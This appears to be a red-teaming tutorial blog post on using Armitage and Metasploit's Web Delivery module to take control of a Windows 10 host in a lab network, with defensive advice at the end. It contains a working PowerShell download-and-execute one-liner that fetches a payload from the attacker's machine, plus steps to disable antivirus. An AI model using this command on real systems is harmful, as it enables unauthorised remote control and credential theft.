Red Teaming Series — Armitage
During a Red Teaming or Penetration Testing engagement, ethical hackers—more accurately termed Penetration Testers—conduct authorized computer intrusion activities against an organization’s systems.
How does a Penetration Tester gain control of a system, whether server, workstation, smartphone, or connected device? The attacker must find a method to execute commands or code on the target system.
One of the most widely deployed tools in the sector is Metasploit (though several alternatives exist).
Armitage is a graphical interface that leverages Metasploit capabilities. The collaboration functionality, implemented via the teamserver command, proves particularly useful during team-based operations.
Armitage functionality enables:
- shared Metasploit session access
- shared hosts, data, and files downloaded from target systems
- team communication
- script creation for automation activities
Attack Scenario
In this example, the attacker’s workstation (Kali Linux) resides within the same network segment as the target (Windows 10).
| Subnet: | 10.0.2.0/24 |
| Kali Linux: | 10.0.2.15 |
| Windows 10: | 10.0.2.4 |
Assuming physical access to the Windows workstation and the ability to execute commands, we elected to use PowerShell to execute commands enabling system control via Web Delivery (T1190 – Exploit Public-Facing Application).
Attacker Configuration (Kali Linux)
For the Kali Linux system, Armitage installation is required:
root@kali:~# apt update root@kali:~# apt install armitage root@kali:~# msfdb init root@kali:~# service postgresql start root@kali:~# armitage
Target Configuration (Windows 10)
For the target system (Windows 10), Windows Defender antivirus was disabled. This is necessary because the PowerShell code would otherwise be immediately flagged as malicious.
It is naturally possible to generate code that circumvents protection systems such as antivirus solutions. This topic will be addressed in a forthcoming article.
Command & Control – Kali
The command and control server (also designated C2 or C&C) in this case coincides with the attacker’s machine and serves as the system for controlling compromised endpoints.
For workstation control, we deployed the Web Delivery module:
- exploit > multi > script > web delivery
PowerShell command:
powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http://10.0.2.15:8080/uyyPYd62NNpvHHU');
Result of successful compromise:
From this position, both threat actors and penetration testers typically proceed with:
This attack phase corresponds to stage 6 “Command & Control” in the Cyber Kill Chain framework:
System interaction enables progression to phase 7 of the Cyber Kill Chain, “Actions on Objectives,” through system enumeration, domain reconnaissance, browser credential extraction, persistence establishment, lateral movement, and related activities:
System enumeration constitutes a critical step for understanding context and obtaining detailed information regarding the compromised endpoint:
Conclusions
The tools and operations described herein represent typical Red Teaming activities and align with operations conducted by cyber-criminals. In the latter case, additional layers of complexity emerge from the target environment, protection systems requiring circumvention, and various filtering and restriction mechanisms.
Defense against these attacks is achievable through adoption of specialized technical solutions and expert activities. Infrastructure defense necessarily incorporates:
- Protection
- Antivirus, firewalls, anti-spam, sandboxes, WAF, and IPS are essential but can be readily circumvented. Continuous monitoring through a Managed SOC provides detection capabilities that extend beyond perimeter defenses.
- Detection
- Monitoring technologies and threat hunting activities conducted by specialized analysts
- Response
- Incident response operations
